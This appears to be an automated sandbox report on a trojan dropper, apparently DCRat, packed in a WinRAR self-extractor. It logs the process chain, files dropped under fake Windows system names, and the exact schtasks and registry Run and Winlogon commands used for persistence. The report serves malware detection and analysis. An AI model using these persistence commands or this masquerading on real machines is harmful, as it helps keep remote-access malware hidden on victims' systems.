Source: Donate_Caper_Fixed.exe, 00000000.00000002.647346279.0000000000610000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs Donate_Caper_Fixed.exe
Source: Donate_Caper_Fixed.exe, 00000000.00000002.648052238.00000000025B0000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs Donate_Caper_Fixed.exe

Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Section loaded: dxgidebug.dll	Jump to behavior

Source: Donate_Caper_Fixed.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: classification engine

Classification label: mal100.troj.evad.winEXE@39/24@2/3

Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe

Code function: 4_2_00166EC9 GetLastError,FormatMessageW,

4_2_00166EC9

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe

Code function: 0_2_0040647C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,

0_2_0040647C

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe

Code function: 0_2_00418A76 CLSIDFromString,CoCreateInstance,

0_2_00418A76

Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe

Code function: 4_2_00179E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

4_2_00179E1C

Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe

File created: C:\Program Files (x86)\microsoft.net\ADOMD.NET\dwm.exe

Jump to behavior

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe

File created: C:\Users\user\AppData\Roaming\__tmp_rar_sfx_access_check_5096343

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_01
Source: C:\Windows\AppReadiness\audiodg.exe	Mutant created: \Sessions\1\BaseNamedObjects\d064b4a11af01162673dad79ee3aadf3
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1744:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_01

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\sessionhostmonitor\1blSZLIJyv82rdJZrD2y.bat' '

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Command line argument: pD	0_2_0040FB40
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Command line argument: sfxcmd	0_2_0040FB40
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Command line argument: sfxcmd	0_2_0040FB40
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Command line argument: sfxname	0_2_0040FB40
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Command line argument: \|*C	0_2_0040FB40
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Command line argument: STARTDLG	0_2_0040FB40
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Command line argument: l*C	0_2_0040FB40
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Command line argument: sfxname	4_2_0017D5D4
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Command line argument: sfxstime	4_2_0017D5D4
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Command line argument: STARTDLG	4_2_0017D5D4

Source: Donate_Caper_Fixed.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\AppReadiness\audiodg.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\AppReadiness\audiodg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\AppReadiness\audiodg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\d3d9on12\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\AppReadiness\audiodg.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\d3d9on12\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\AppReadiness\audiodg.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\AppReadiness\audiodg.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Donate_Caper_Fixed.exe	Virustotal: Detection: 35%
Source: Donate_Caper_Fixed.exe	ReversingLabs: Detection: 31%

Source: sessionhostmonitorSavesruntimeNet.exe	String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
Source: audiodg.exe	String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
Source: msiexec.exe	String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
Source: conhost.exe	String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
Source: conhost.exe	String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
Source: dwm.exe	String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
Source: audiodg.exe	String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
Source: msiexec.exe	String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe

File read: C:\Users\user\Desktop\Donate_Caper_Fixed.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Donate_Caper_Fixed.exe 'C:\Users\user\Desktop\Donate_Caper_Fixed.exe'
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Process created: C:\Users\user\AppData\Roaming\Donate_Caper2021.sfx.exe 'C:\Users\user\AppData\Roaming\Donate_Caper2021.sfx.exe'
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.sfx.exe	Process created: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe 'C:\Users\user\AppData\Roaming\Donate_Caper2021.exe'
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\sessionhostmonitor\RfInN2Wh.vbe'
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\sessionhostmonitor\1blSZLIJyv82rdJZrD2y.bat' '
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Windows\System32\schtasks.exe 'schtasks' /create /tn 'audiodg' /sc ONLOGON /tr ''C:\Windows\AppReadiness\audiodg.exe'' /rl HIGHEST /f
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Windows\System32\schtasks.exe 'schtasks' /create /tn 'msiexec' /sc ONLOGON /tr ''C:\Windows\System32\d3d9on12\msiexec.exe'' /rl HIGHEST /f
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Windows\System32\schtasks.exe 'schtasks' /create /tn 'UsoClient' /sc ONLOGON /tr ''C:\Windows\System32\wlanapi\UsoClient.exe'' /rl HIGHEST /f
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\AppReadiness\audiodg.exe C:\Windows\AppReadiness\audiodg.exe
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Windows\System32\schtasks.exe 'schtasks' /create /tn 'HxTsr' /sc ONLOGON /tr ''C:\MSOCache\All Users\{90160000-0115-0409-0000-0000000FF1CE}-C\HxTsr.exe'' /rl HIGHEST /f
Source: unknown	Process created: C:\Windows\System32\d3d9on12\msiexec.exe C:\Windows\System32\d3d9on12\msiexec.exe
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Windows\System32\schtasks.exe 'schtasks' /create /tn 'dwm' /sc ONLOGON /tr ''C:\Program Files (x86)\microsoft.net\ADOMD.NET\dwm.exe'' /rl HIGHEST /f
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Windows\System32\schtasks.exe 'schtasks' /create /tn 'conhost' /sc ONLOGON /tr ''C:\Program Files (x86)\microsoft sql server\110\Shared\conhost.exe'' /rl HIGHEST /f
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe C:\Program Files (x86)\microsoft sql server\110\Shared\conhost.exe
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe C:\Program Files (x86)\microsoft sql server\110\Shared\conhost.exe
Source: unknown	Process created: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe C:\Program Files (x86)\microsoft.net\ADOMD.NET\dwm.exe
Source: unknown	Process created: C:\Windows\AppReadiness\audiodg.exe 'C:\Windows\AppReadiness\audiodg.exe'
Source: unknown	Process created: C:\Windows\System32\d3d9on12\msiexec.exe 'C:\Windows\System32\d3d9on12\msiexec.exe'
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Process created: C:\Users\user\AppData\Roaming\Donate_Caper2021.sfx.exe 'C:\Users\user\AppData\Roaming\Donate_Caper2021.sfx.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.sfx.exe	Process created: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe 'C:\Users\user\AppData\Roaming\Donate_Caper2021.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\sessionhostmonitor\RfInN2Wh.vbe'	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\sessionhostmonitor\1blSZLIJyv82rdJZrD2y.bat' '	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Windows\System32\schtasks.exe 'schtasks' /create /tn 'audiodg' /sc ONLOGON /tr ''C:\Windows\AppReadiness\audiodg.exe'' /rl HIGHEST /f	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Windows\System32\schtasks.exe 'schtasks' /create /tn 'msiexec' /sc ONLOGON /tr ''C:\Windows\System32\d3d9on12\msiexec.exe'' /rl HIGHEST /f	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Windows\System32\schtasks.exe 'schtasks' /create /tn 'UsoClient' /sc ONLOGON /tr ''C:\Windows\System32\wlanapi\UsoClient.exe'' /rl HIGHEST /f	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Windows\System32\schtasks.exe 'schtasks' /create /tn 'HxTsr' /sc ONLOGON /tr ''C:\MSOCache\All Users\{90160000-0115-0409-0000-0000000FF1CE}-C\HxTsr.exe'' /rl HIGHEST /f	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Windows\System32\schtasks.exe 'schtasks' /create /tn 'dwm' /sc ONLOGON /tr ''C:\Program Files (x86)\microsoft.net\ADOMD.NET\dwm.exe'' /rl HIGHEST /f	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Windows\System32\schtasks.exe 'schtasks' /create /tn 'conhost' /sc ONLOGON /tr ''C:\Program Files (x86)\microsoft sql server\110\Shared\conhost.exe'' /rl HIGHEST /f	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Process created: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe C:\Program Files (x86)\microsoft sql server\110\Shared\conhost.exe	Jump to behavior

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Donate_Caper_Fixed.exe

Static file information: File size 3422325 > 1048576

Source: Donate_Caper_Fixed.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Donate_Caper2021.exe, 00000004.00000000.654831138.0000000000193000.00000002.00020000.sdmp, Donate_Caper2021.exe.2.dr
Source:	Binary string: d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb source: Donate_Caper_Fixed.exe
Source:	Binary string: C:\a\b\d_00000000_\b\out\Win32\Release\starter.pdb{ source: Donate_Caper_Fixed.exe, 00000000.00000003.643185472.0000000004640000.00000004.00000001.sdmp, ks4.021.3.10.391ru_25000.exe.0.dr
Source:	Binary string: C:\a\b\d_00000000_\b\out\Win32\Release\starter.pdb source: Donate_Caper_Fixed.exe, 00000000.00000003.643185472.0000000004640000.00000004.00000001.sdmp, ks4.021.3.10.391ru_25000.exe.0.dr

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe

Code function: 0_2_004251E5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

0_2_004251E5

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe

File created: C:\Users\user\AppData\Roaming\__tmp_rar_sfx_access_check_5096343

Jump to behavior

Source: ks4.021.3.10.391ru_25000.exe.0.dr	Static PE information: section name: .didat
Source: Donate_Caper2021.exe.2.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_0041F4E1 push ecx; ret	0_2_0041F4F4
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	Code function: 0_2_00419DD4 push eax; ret	0_2_00419DF2
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0017E28C push eax; ret	4_2_0017E2AA
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Code function: 4_2_0017ED46 push ecx; ret	4_2_0017ED59
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Code function: 10_2_00007FFA35C57717 push ebx; retf	10_2_00007FFA35C5771A
Source: C:\Windows\AppReadiness\audiodg.exe	Code function: 18_2_00007FFA35C57717 push ebx; retf	18_2_00007FFA35C5771A
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Code function: 21_2_00007FFA35C47717 push ebx; retf	21_2_00007FFA35C4771A
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Code function: 28_2_00007FFA35C2CF8C push cs; retf	28_2_00007FFA35C2CFAA
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Code function: 28_2_00007FFA35C27717 push ebx; retf	28_2_00007FFA35C2771A
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Code function: 28_2_00007FFA35C2E6E4 push ss; retf	28_2_00007FFA35C2E70A
Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Code function: 29_2_00007FFA35C47717 push ebx; retf	29_2_00007FFA35C4771A
Source: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Code function: 30_2_00007FFA35C57717 push ebx; retf	30_2_00007FFA35C5771A
Source: C:\Windows\AppReadiness\audiodg.exe	Code function: 33_2_00007FFA35C39660 push es; retf	33_2_00007FFA35C39661
Source: C:\Windows\AppReadiness\audiodg.exe	Code function: 33_2_00007FFA35C39019 push es; retf	33_2_00007FFA35C3901A
Source: C:\Windows\AppReadiness\audiodg.exe	Code function: 33_2_00007FFA35C397DF push es; retf	33_2_00007FFA35C397E0
Source: C:\Windows\AppReadiness\audiodg.exe	Code function: 33_2_00007FFA35C37717 push ebx; retf	33_2_00007FFA35C3771A
Source: C:\Windows\AppReadiness\audiodg.exe	Code function: 33_2_00007FFA35C3A47E pushfd ; ret	33_2_00007FFA35C3A515
Source: C:\Windows\AppReadiness\audiodg.exe	Code function: 33_2_00007FFA35C39353 push es; retf	33_2_00007FFA35C39354
Source: C:\Windows\System32\d3d9on12\msiexec.exe	Code function: 35_2_00007FFA35C57717 push ebx; retf	35_2_00007FFA35C5771A

Persistence and Installation Behavior:

Drops PE files with benign system names

Show sources

Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe

File created: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe

Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: unknown	Executable created and started: C:\Windows\AppReadiness\audiodg.exe
Source: unknown	Executable created and started: C:\Windows\System32\d3d9on12\msiexec.exe

Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	File created: C:\Users\user\AppData\Roaming\DCRatBuild.sfx.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	File created: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Donate_Caper2021.sfx.exe	File created: C:\Users\user\AppData\Roaming\Donate_Caper2021.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	File created: C:\Users\user\AppData\Roaming\Donate_Caper2021.sfx.exe	Jump to dropped file
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	File created: C:\Windows\AppReadiness\audiodg.exe	Jump to dropped file
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	File created: C:\Windows\System32\d3d9on12\msiexec.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Donate_Caper_Fixed.exe	File created: C:\Users\user\AppData\Roaming\ks4.021.3.10.391ru_25000.exe	Jump to dropped file
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	File created: C:\MSOCache\All Users\{90160000-0115-0409-0000-0000000FF1CE}-C\HxTsr.exe	Jump to dropped file
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	File created: C:\Windows\System32\wlanapi\UsoClient.exe	Jump to dropped file
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	File created: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\conhost.exe	Jump to dropped file
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	File created: C:\Program Files (x86)\Microsoft.NET\ADOMD.NET\dwm.exe	Jump to dropped file

Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	File created: C:\Windows\AppReadiness\audiodg.exe	Jump to dropped file
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	File created: C:\Windows\System32\d3d9on12\msiexec.exe	Jump to dropped file
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	File created: C:\Windows\System32\wlanapi\UsoClient.exe	Jump to dropped file

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows

Show sources

Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run audiodg

Jump to behavior

Creates an undocumented autostart registry key

Show sources

Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell

Jump to behavior

Creates multiple autostart registry keys

Show sources

Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HxTsr	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msiexec	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UsoClient	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dwm	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run conhost	Jump to behavior

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe

Process created: C:\Windows\System32\schtasks.exe 'schtasks' /create /tn 'audiodg' /sc ONLOGON /tr ''C:\Windows\AppReadiness\audiodg.exe'' /rl HIGHEST /f

Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run audiodg	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run audiodg	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run audiodg	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run msiexec	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run msiexec	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msiexec	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msiexec	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run UsoClient	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run UsoClient	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UsoClient	Jump to behavior
Source: C:\sessionhostmonitor\sessionhostmonitorSavesruntimeNet.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UsoClient	Jump to behavior
